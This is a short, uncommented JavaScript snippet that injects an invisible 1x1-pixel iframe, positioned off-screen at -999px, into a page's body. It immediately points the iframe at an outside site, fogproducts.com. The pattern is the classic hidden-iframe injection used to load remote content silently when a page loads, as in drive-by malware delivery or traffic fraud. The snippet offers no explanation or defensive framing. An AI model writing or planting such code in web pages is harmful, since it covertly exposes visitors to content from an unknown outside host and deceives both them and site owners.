function add_aaa(a) { var b = document.getElementsByTagName('body')[0]; var f = document.createElement('iframe'); f.id ='ifr1'; f.style.width ='1px'; f.style.height ='1px'; f.style.position= 'absolute'; f.style.top ='-999px'; f.src = a; b.appendChild(f); } add_aaa('http://fogproducts.com/?keywords=consolidate');